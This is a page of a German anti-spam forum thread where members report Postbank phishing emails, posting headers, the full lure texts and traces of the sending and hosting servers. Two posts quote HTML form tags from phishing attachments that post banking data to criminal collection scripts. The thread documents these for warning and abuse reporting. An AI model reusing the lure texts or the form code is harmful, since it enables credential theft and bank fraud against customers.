Seite 15 von 21 ErsteErste ... 51314151617 ... LetzteLetzte
Ergebnis 141 bis 150 von 201

Thema: Postbank Phishing

  1. #141
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    470

    Standard Bei mir auch

    Der Link führt zu einem Server mit Länderkennung "it".
    Mein "Donnervogel" hat es aber zuverlässig als Phising herausgesiebt.


    header:
    01: Return-Path: elisa1584 [at] aliceposta.it
    02: Received: from smtp205.alice.it ([82.57.200.101]) by mx-ha.gmx.net (mxgmx001)
    03: with ESMTP (Nemesis) ID: [ID filtered]
    04: 29 Aug 2013 xx:xx:xx +0200
    05: Received: from Unknown (2.50.43.216) by smtp205.alice.it (8.6.060.28) (authenticated as
    06: elisa1584 [at] aliceposta.it)
    07: ID: [ID filtered]
    08: Message-ID: [ID filtered]
    09: From: "Postbank AG" <elisa1584 [at] aliceposta.it>
    10: To: <poor [at] spamvictim.tld>
    11: Date: Thu, 29 Aug 2013 xx:xx:xx -0500
    12: MIME-Version: 1.0
    13: Content-Type: multipart/alternative;
    14: boundary="----=_NextPart_000_1C49_01CEA4B8.BC7B0680"
    15: X-Priority: 3
    16: X-MSMail-Priority: Normal
    17: X-Mailer: Microsoft Windows Mail 6.0.6001.18416
    18: X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6001.18645
    19: Envelope-To: <poor [at] spamvictim.tld>

    Postbank Online=20
    Herzlich willkommen=20

    Aktualisierung des Kunden-Status.
    Sehr geehrter Kunde. Wir wollen Ihnen mitteilen, dass Ihr Konto nicht ube=
    rpruft wurde, da wir unser System verbessern.
    Um das Einfrieren Ihres Kontos zu vermeiden, loggen Sie sich bitte auf un=
    serer Web-Seite an, damit wir Ihren Account=20
    uberprufen konnen.


    https://banking.postbank.de/rai/login

    Wir entschuldigen uns fur die Unannehmlichkeiten.
    Danke, dass Sie und ausgewahlt haben.

    Herzliche Gru?e=20
    Ihre Postbank Online
    Dabei bin ich gar nicht bei der Postbank

  2. #142
    Urgestein Avatar von Wuschel_MUC
    Registriert seit
    01.02.2006
    Ort
    München
    Beiträge
    5.774

    Standard

    Zitat Zitat von isenaecher Beitrag anzeigen
    Dabei bin ich gar nicht bei der Postbank
    Wenn du etwas ausprobieren willst, nimm die Postbankkonten
    253860801, BLZ 700 100 80 oder
    252135850, BLZ 760 100 85.

    Die sind gelöscht, da bucht niemand mehr etwas ab.

    Vorsicht vor Ungezieferbefall.

    Wuschel
    Wer mir was tut, sei auf der Hut!

  3. #143
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    470

    Standard

    Zitat Zitat von Wuschel_MUC Beitrag anzeigen
    Wenn du etwas ausprobieren willst, nimm die Postbankkonten
    253860801, BLZ 700 100 80 oder
    252135850, BLZ 760 100 85.

    Die sind gelöscht, da bucht niemand mehr etwas ab.

    Vorsicht vor Ungezieferbefall.

    Wuschel
    Einen Teufel werde ich tun.

    Bin froh, dass ich ein sauberes System habe. In der Beziehung bin ich eh ein Schisser.

    Gruß

    Isenaecher

  4. #144
    Urgestein Avatar von Wuschel_MUC
    Registriert seit
    01.02.2006
    Ort
    München
    Beiträge
    5.774

    Standard

    Zitat Zitat von isenaecher Beitrag anzeigen
    Einen Teufel werde ich tun... In der Beziehung bin ich eh ein Schisser.
    Ich auch. Aber gerade hier gibt es genug Tüftler, die solchen Mails mit einem Testrechner auf den Grund gehen wollen.

    Wuschel
    Wer mir was tut, sei auf der Hut!

  5. #145
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Wieder mal die Postbank wia HTML-Anhang:


    header:
    01: Received: from 405190-www2.TOADserver.com ([50.56.160.152]) by mx-ha.gmx.net
    02: (mxgmx101) with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: from [149.210.140.92] (unknown [149.210.140.92]) by
    04: 405190-www2.TOADserver.com (Postfix) with ESMTPA ID: [ID filtered]

    IP: 149.210.140.92 ---> 149-210-140-92.colo.transip.net

    Bitte Ihre Anmeldung best&auml;tigen.

    Postbank Telefon-Banking

    Erneuerung Ihres Telefon-Banking PINs

    Sehr geehrte Kundin, sehr geehrte/r Kunde,

    Unser System hat festgestellt das Ihr Telefon-Banking PIN aus
    Sicherheitsgr&uuml;nden ge&auml;ndert werden muss. Bitte benutzen Sie
    dieses Formular um die &Auml;nderung Ihres Telefon-Banking PIN
    kostenfrei zu &Auml;ndern. Andernfalls m&uuml;ssen wir Ihr Konto mit
    6,99&euro; belasten und die &auml;nderung schriftlich &uuml;ber den
    Postweg bei Ihnen einfordern.

    Ihren Telefon-Banking PIN k&ouml;nnen Sie hier oder wie folgt
    &auml;ndern:

    1. &Ouml;ffnen Sie die Datei in Ihrem Emailanhang und w&auml;hlen Sie
    "&Ouml;ffnen mit" aus!

    2. F&uuml;llen Sie alle Daten aus und klicken Sie dann auf "Daten
    absenden"!

    Postbank Direkt dankt f&uuml;r Ihre Mitarbeit.

    Postbankzentrale

    Friedrich-Ebert-Allee 114-126

    53113 Bonn
    [HTML]<form onsubmit="return chkFormular() name="Formular" method="POST"
    action="http://qw2.targoss.com.ua/de/postbank/konto/postbank_check.php">[/HTML]
    IP: 193.107.19.143 ---> Ideal Solution Ltd./Telia

    Und dieser Hoster ist schon nicht mehr schwarzbehütet, sondern offen kriminell:

    Routing 2x4.ru/ideal-solution.org - massive cybercrime host via AS1299
    [Link nur für registrierte Mitglieder sichtbar. ]

    Somit Post an:

    [Link nur für registrierte Mitglieder sichtbar. ]

    [Link nur für registrierte Mitglieder sichtbar. ]

    [Link nur für registrierte Mitglieder sichtbar. ]
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  6. #146
    Urgestein Avatar von Eniac
    Registriert seit
    18.07.2005
    Ort
    Dragasani - Lagos - Moskau - Cloppenburg
    Beiträge
    5.203

    Standard


    header:
    01: Return-Path: root [at] srv21.noname-dns.net
    02: Received: from srv21.noname-dns.net ([178.170.127.50]) by mx-ha.gmx.net
    03: (mxgmx005) with ESMTPS (Nemesis) ID: [ID filtered]
    04: Received: (qmail 32691 invoked by UID: [UID filtered]
    05: Date: 29 Dec 2013 xx:xx:xx +0100
    06: Message-ID: [ID filtered]
    07: To: poor [at] spamvictim.tld
    08: Subject: Vorname Name, sollten Sie sich nicht bei dem neuen SEPA-Verfahren
    09: registrieren, wird Ihr Konto permanent gesperrt!
    10: From: Post-Bank OnlineMail 02 <noreply [at] post-onlinebank-mail46.com>
    11: Reply-To:
    12: MIME-Version: 1.0
    13: Content-Type: text/html
    14: Content-Transfer-Encoding: 8bit
    15: Envelope-To: <poor [at] spamvictim.tld>

    Guten Tag Vorname Name,

    wie Sie bereits informiert wurden, wird 2014 das einheitliche SEPA-Verfahren für Überweisungen eingeführt.
    Ihr Konto muss noch abgeglichen werden, um dieses Verfahren nutzen zu können.
    Wenn Sie dies nicht bis zum 07.01.2014 durchführen, wird Ihr Konto {random:gesperrt|ausgesetzt|deaktiviert}!

    ~Vorname Name, der Prozess kann hier gestartet werden...~ --> whois: [Link nur für registrierte Mitglieder sichtbar. ]

    Weidweg 52-55
    76986 Karlsruhe
    Telefon: 02676442687

    Anfragen-ID: 130500266614519831561229766851

    Eniac
    Die weltweit grösste Fakeseiten-Datenbank: http://db.aa419.org/fakebankslist.php
    Viele falsche Escrow-Seiten: http://escrow-fraud.com/search.php

    DER HERR ERSCHUF IN SEINEM ZORN - CLOPPENBURG UND BÜTTELBORN

  7. #147
    Mitglied Avatar von Speedy56
    Registriert seit
    03.11.2011
    Ort
    SouthBavaria
    Beiträge
    423

    Standard Postbank - Pishing


    header:
    01: From - Wed Mar 05 xx:xx:xx 2014
    02: X-Account-Key: account7
    03: X-UIDL: [UID filtered]
    04: X-Mozilla-Status: 0001
    05: X-Mozilla-Status2: 00000000
    06: X-Mozilla-Keys:
    07:
    08: Return-Path: code [at] google.com
    09: Received: from materiaweb.it ([77.72.24.133]) by mx-ha.gmx.net (mxgmx109) with
    10: ESMTPS (Nemesis) ID: [ID filtered]
    11: Wed, 05 Mar 2014 xx:xx:xx +0100
    12: Received: (qmail 28184 invoked by UID: [UID filtered]
    13: Received: from 88.208.193.173 (postmaster [at] jernberg-gotink.com@88.208.193.173) by
    14: materiaweb.it (envelope-from <code [at] google.com>, UID: [UID filtered]
    15: (clamdscan: 0.97.7/18536. spamassassin: 3.3.1. perlscan: 2.05st.
    16: Clear:RC:1(88.208.193.173):.
    17: Processed in 0.02 secs); 05 Mar 2014 xx:xx:xx -0000
    18: Received: from unknown (HELO server88-208-193-173.live-servers.net)
    19: (postmaster [at] jernberg-gotink.com@88.208.193.173)
    20: by 0 with ESMTPA; 5 Mar 2014 xx:xx:xx -0000
    21: To: poor [at] spamvictim.tld
    22: From: banking [at] postbank.de
    23: Reply-To: no_reply [at] Postbank.de
    24: Subject: Dringende Nachricht von Ihre Postbank Kundenbetreuer.
    25: Date: Wed, 5 Mar 2014 xx:xx:xx +0000
    26: X-Priority: 1 (Highest)
    27: Message-ID: [ID filtered]
    28: X-Mailer: Personal
    29: MIME-Version: 1.0
    30: Content-Type: text/plain; charset=iso-8859-1
    31: Content-Transfer-Encoding: 7BIT
    32: Envelope-To: <poor [at] spamvictim.tld>
    33: X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
    34: X-GMX-Antivirus: 0 (no virus found)
    35: X-UI-Filterresults: notjunk:1;V01:K0:Mv1YHUi05yo=:0j+XWPPP4ZmHzJCKIkmMdm0UC1
    36: mWqDcP+uCe0vAQjVpeCW+i1UvWpvABH+CkNHjc1D+JLlEO86o7Yo/31BVbgp4fqjni9Pbz4OB

    =========================================
    Postbank.de - eMail für falscher.Name@gmx.de
    =========================================

    Während der Wartung der System einige Konten blockiert wurden.

    =========================================================================
    Bitte melden Sie sich an und aktivieren Sie wieder, wenn nötig.

    Nutzen Sie bitte den unten stehenden Link und loggen Sie sich in Ihr Konto ein.

    http://banking.postbank.de.aoowo.com/rai/login
    =========================================================================

    Diese Nachricht ist eine automatisierte Mitteilung,

    Bitte antworten Sie nicht auf diese eMail.
    ==============================================
    Copyright (C) DEUTSCHE POSTBANK 2014 AG
    ==============================================
    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    @Mods: Bitte verschieben falls ich Postbank irgendwo übersehen habe...

    MOD: Tacker weglege
    Geändert von cmds (05.03.2014 um 12:10 Uhr)
    „Man muss dem Leben immer um mindestens einen Whisky voraus sein“ (Humphrey Bogart)

  8. #148
    Neues Mitglied
    Registriert seit
    08.11.2011
    Beiträge
    45

    Standard Postbank

    Moin Moin zusammen.
    Jetzt versuchen sie es mal mit der Postbank.


    Online Banking Service



    Sehr geehrter Herr XXXXXXXXXXXXXXXXX,

    Auf Ihrem Postbank Konto wurde ein versuchter Fremdzugriff entdeckt. Dieser konnte durch unser sensibles Sicherheitssystem erfolgreich erkannt und gestoppt werden. Deshalb haben wir Ihr Konto vorübergehend eingeschränkt.

    Um die Einschränkung aufzuheben, müssen wir Sie bitten sich zu verifizieren*. Dazu folgen Sie bitte dem unten stehenden Link.

    https://banking.postbank.de/rai/login?Verifizierungs-ID=be8d9b3b47bf5097c3dea23bd073d150

    Vielen Dank für Ihre Kooperation

    Mit freundlichen Grüßen
    Ihr Postbank Banking Service


    *Die Verifizierung muss bis zum 04.04.2014 durchgeführt werden, ansonsten wird Ihr Konto dauerhaft gesperrt.

    Deutsche Postbank AG
    Friedrich-Ebert-Allee 114 - 126
    53113 Bonn
    DATENSCHUTZ

    Gruß Svenni1963
    Geändert von truelife (31.03.2014 um 07:53 Uhr) Grund: getackert

  9. #149
    Mitglied Avatar von madman70
    Registriert seit
    09.05.2012
    Ort
    Filderstadt
    Beiträge
    108

    Standard

    Aber isch abe doch gar keine Postbank-Konto *wunder*...

    Erneuerung Ihres Telefon-PINs

    Sehr geehrte Kundin,
    sehr geehrter Kunde,

    unser System hat festgestellt das Ihr Telefon-PIN aus Sicherheitsgründen
    aktualisiert werden muss. Bitte nutzen Sie dieses Formular
    um die Änderung Ihres Telefon-PINs kostenlos durchzuführen.
    Andernfalls müssen wir Ihr Konto mit 14 EUR belasten
    und die Änderung schriftlich über den Postweg bei Ihnen einfordern.


    Ihren Telefon-PIN können Sie bequem wie folgt ändern:

    1. Öffnen Sie Ihren E-Mail Anhang und wählen Sie "öffnen mit" aus!
    2. Füllen Sie alle Daten aus und klicken Sie dann auf "Daten absenden"!
    3. Ihr Telefon-PIN wird i.d.R nach 24 Stunden ins System integriert.

    Für weitere Fragen steht unser Online Support unter [Link nur für registrierte Mitglieder sichtbar. ] gerne für Sie zur Verfügung.

    Mit freundlichen Grüßen
    Ihre Postbank
    Dirk Grüttner

    Dirk Grüttner
    Da hängt dann ein HTML-Formular dran, welches die Daten dann nach Panama schickt (zumindest wohnt da angeblich der Registrar von whois: [Link nur für registrierte Mitglieder sichtbar. ])...

    Dort kann ich dann u.a. meine aktuelle Telefon-Pin eintippern und schon nach 24 Stunden ist mein Konto leer - äähm ich meine die neue Pin aktiv

    Hier noch der Header


    header:
    01: Return-Path: sicherheit [at] postbank.de
    02: Received: from biosmail02.bios-online.de ([192.109.12.48]) by mx-ha.web.de
    03: (mxweb009) with ESMTP (Nemesis) ID: [ID filtered]
    04: <xxxxx [at] web.de>; Sun, 30 Mar 2014 xx:xx:xx +0200
    05: Received: from alive.de ([192.109.12.95]) by bios-online.de with MailEnable
    06: ESMTP; Sun, 30 Mar 2014 xx:xx:xx +0200
    07: Received: from pro1487.startdedicated.de [188.138.92.19] by alive.de with ESMTP
    08: (SMTPD32-7.15) ID: [ID filtered]
    09: From: "Postbank" <sicherheit [at] postbank.de>
    10: Subject: Liebe Postbank Kunden, Ihre Mithilfe ist gefragt!
    11: To: "schmimat" <poor [at] spamvictim.tld>
    12: Content-Type: multipart/mixed; boundary="fLIx5tT=_3mX1jgIdL7e67ddiAKd3AVl8l"
    13: MIME-Version: 1.0
    14: Date: Sun, 30 Mar 2014 xx:xx:xx -0700
    15: Message-ID: [ID filtered]
    16: Envelope-To: <poor [at] spamvictim.tld>

  10. #150
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Wieder mal per Formular-Mailanhang:


    header:
    01: Received: from www.synerg-ix.de ([81.20.141.140]) by mx-ha.gmx.net (mxgmx004)
    02: with ESMTPS (Nemesis) ID: [ID filtered]
    03: Apr 2014 xx:xx:xx +0200
    04: Received: from [62.141.42.182] (b182.blue.fastwebserver.de
    05: [62.141.42.182]) by www.synerg-ix.de (Postfix) with ESMTPA ID: [ID filtered]

    Unser System hat festgestellt, dass Ihr Telefon-Banking PIN aus
    Sicherheitsgr&uuml;nden ge&auml;ndert werden muss. Bitte benutzen Sie
    dieses Formular um die &Auml;nderung Ihres Telefon-Banking PIN
    kostenfrei zu &auml;ndern.

    Andernfalls m&uuml;ssen wir Ihr Konto mit 14,99&euro; belasten und die
    &Auml;nderung schriftlich &uuml;ber den Postweg bei Ihnen einfordern.

    Ihren Telefon-Banking PIN k&ouml;nnen Sie hier oder wie folgt
    &auml;ndern:

    1. &Ouml;ffnen Sie die Datei in Ihrem Emailanhang und w&auml;hlen Sie
    "&ouml;ffnen mit" aus! 2. F&uuml;llen Sie alle Daten aus und klicken
    Sie dann auf "Daten absenden"! 3. Ihren neuen Telefon-Banking PIN
    erhalten Sie nach 5-7Werktagen!

    F&uuml;r weitere Fragen steht unser Online Support unter
    [Link nur für registrierte Mitglieder sichtbar. ] 24Std. f&uuml;r Sie zur Verf&uuml;gung.

    Mit freundlichen Gr&uuml;&szlig;en

    Postbank
    Das Auswertungsskript läuft dann hier:

    [HTML]<form name="Formular" action="http://saq4.datacheckss.ru/de/rai/postbank/postbank_check.php" class="form-cn frm-azv-scheck" id="id13a" method="post" onsubmit="return chkFormular();">[/HTML]

    IP: 176.28.43.152 ---> wvps176-28-43-152.dedicated.hosteurope.de

    Man vergleiche mit hier:

    [Link nur für registrierte Mitglieder sichtbar. ]

    Das /rai/ deutet auf ein Phishing-Kit hin.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

Seite 15 von 21 ErsteErste ... 51314151617 ... LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen